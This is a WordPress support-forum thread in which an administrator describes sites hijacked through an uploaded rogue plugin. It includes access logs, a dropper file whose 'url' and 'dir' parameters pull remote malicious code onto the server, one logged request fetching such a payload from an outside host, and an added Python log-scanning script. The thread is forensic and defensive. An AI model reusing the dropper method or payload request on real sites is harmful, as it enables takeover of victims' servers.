• Resolved ImanGM

    (@credo61)


    Hello there,

    I’m managing some servers and I’ve figured out some WordPress sites (from different clients and different developers) are hacked a few days after their installations.

    But, the hacking methods are completely similar to each other. This is what will happen:

    1. A user logs into WordPress on their first try (it seems there are no brute-force attacks).
    2. The logged-in user uploads a plugin named itr-popup.

    Here are the logs:

    202.58.105.15 - - [23/May/2019:06:41:41 +0430] "GET /wp-login.php HTTP/1.0" 200 3944 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
    202.58.105.15 - - [23/May/2019:06:41:31 +0430] "HEAD /wp-login.php HTTP/1.0" 200 570 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
    202.58.105.15 - - [23/May/2019:06:41:45 +0430] "POST /wp-login.php HTTP/1.0" 302 1293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
    202.58.105.15 - - [23/May/2019:06:41:47 +0430] "GET /wp-admin/ HTTP/1.0" 200 127945 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
    202.58.105.15 - - [23/May/2019:06:41:56 +0430] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.0" 200 81558 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
    202.58.105.15 - - [23/May/2019:06:42:09 +0430] "GET /wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts.php HTTP/1.0" 200 5813 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
    202.58.105.15 - - [23/May/2019:06:42:03 +0430] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.0" 200 51039 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"

    3. This plugin contains a file named itro-admin-scripts.php. This file accepts two parameters:

    – url: the URL of a txt file that contains malicious code.
    – dir: where to save this malware on the victim site.

    With this method, the hacker uploads any files he/she wants to the website and uses them to hack other websites as well.

    These are the logs of the way the hacker uploaded the scripts:

    51.15.180.50 - - [23/May/2019:11:08:32 +0430] "GET /wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts.php?url=http://nataliehaley.kage-tora.com/wp.txt&dir=wp-content/plugins/itr-popup/scripts/jscolor HTTP/1.0" 200 1047 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"

    Both sites that this happened to were using WordPress 5.2.1, and they made sure that they did not install this itr-popup plugin on their WordPress website.

    Please note that they are different clients, different developers on different servers.

    I even downloaded this plugin from the WordPress repository and it was clean, and the itro-admin-scripts.php file which I said the hacker used to upload malware to the websites is not included in the original version downloaded from WordPress.org. So, I believe that it’s not a problem with this plugin.

    I didn’t find any similar attack reports on the internet. Anyone else having the same issue here? I worry if it’s some kind of a bug in WordPress 5.2.1 itself.

    Thank you for your help.
    Iman
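    The three indicators described in this post (a wp-login.php POST that succeeds on the first attempt, a plugin upload through update.php, and a request to a PHP file under wp-content/plugins carrying url and dir parameters) can be pulled out of Apache access logs automatically. The script below is an added example written for this thread, not code posted by anyone in it; the log lines it parses are constructed in the same combined format as the excerpts above, using documentation IP addresses and a placeholder download URL, and it sorts by timestamp first because the excerpts are not in time order.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log line, the format used in the excerpts above.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # not a combined-format line
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    u = urlsplit(e["target"])
    e["path"], e["qs"] = u.path, parse_qs(u.query)
    return e

def find_indicators(lines):
    """Return (ip, timestamp, label) tuples for the three indicators."""
    # Log excerpts are not always in time order, so sort before tracking state.
    events = sorted(filter(None, map(parse_line, lines)), key=lambda e: e["ts"])
    findings, login_posts = [], {}  # login_posts: ip -> POST /wp-login.php count
    for e in events:
        ip, path, qs = e["ip"], e["path"], e["qs"]
        if e["method"] == "POST" and path == "/wp-login.php":
            login_posts[ip] = login_posts.get(ip, 0) + 1
            # WordPress re-renders the form (200) on failure and redirects (302) on success.
            if e["status"] == 302 and login_posts[ip] == 1:
                findings.append((ip, e["ts"], "login succeeded on first POST"))
        elif e["method"] == "POST" and path == "/wp-admin/update.php" \
                and qs.get("action") == ["upload-plugin"]:
            findings.append((ip, e["ts"], "plugin uploaded via dashboard"))
        elif path.startswith("/wp-content/plugins/") and path.endswith(".php") \
                and {"url", "dir"}.issubset(qs):
            findings.append((ip, e["ts"], "dropper called: " + path))
    return findings

# Constructed sample lines (documentation IPs, placeholder URL), not the thread's real log.
SAMPLE_LOG = """\
192.0.2.10 - - [23/May/2019:06:41:41 +0430] "GET /wp-login.php HTTP/1.0" 200 3944 "-" "UA"
192.0.2.10 - - [23/May/2019:06:41:45 +0430] "POST /wp-login.php HTTP/1.0" 302 1293 "-" "UA"
192.0.2.10 - - [23/May/2019:06:42:09 +0430] "GET /wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts.php HTTP/1.0" 200 5813 "-" "UA"
192.0.2.10 - - [23/May/2019:06:42:03 +0430] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.0" 200 51039 "-" "UA"
198.51.100.7 - - [23/May/2019:11:08:32 +0430] "GET /wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts.php?url=http://example.invalid/wp.txt&dir=wp-content/plugins/itr-popup/scripts/jscolor HTTP/1.0" 200 1047 "-" "UA"
203.0.113.5 - - [23/May/2019:12:00:00 +0430] "POST /wp-login.php HTTP/1.0" 200 3900 "-" "UA"
203.0.113.5 - - [23/May/2019:12:00:20 +0430] "POST /wp-login.php HTTP/1.0" 302 1293 "-" "UA"
""".splitlines()
```

    The last two constructed lines show a login that failed once before succeeding; that host is deliberately not flagged, which is what separates the pattern in this thread from an ordinary typo on the login page.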

Viewing 4 replies - 1 through 4 (of 4 total)
  • Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    You shouldn’t care what happens at steps 2 and 3 because you’ll be led on a wild goose chase. I strongly advise investing time in resolving step 1.

    FAQ My site was hacked

    Thread Starter ImanGM

    (@credo61)

    Hello Andrew,

    Thank you for your reply. So, is there any way to find out how this user logged into WordPress from the log files? I guess, by default, there isn’t any logging feature in WordPress, and Apache doesn’t log the content of POST requests to find out which account was used to log into WordPress.

    As I said before, this site was under construction and I can recreate it. So, there is no problem with it. But just for forensics, and since this is not the first time a similar attack has happened within the last month, I want to find out how this user was able to log into WordPress on his first try…

    Any suggestions for investigating this issue?

    Thank you.
    Iman

    Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    Hi Iman, does it matter whether the user (most likely a bot) was or was not logged into the dashboard? At this point your environment would already be compromised. This is part of the goose chase that you should not invest any more time in.

    Thread Starter ImanGM

    (@credo61)

    Hey Andrew,

    Thank you for your advice. I’ve reinstalled the site, made some improvements to the login page, and put some monitoring tools on it to check whether this happens again.

    Thank you again.
    Iman


The topic ‘Different sites where hacked the same way on different servers’ is closed to new replies.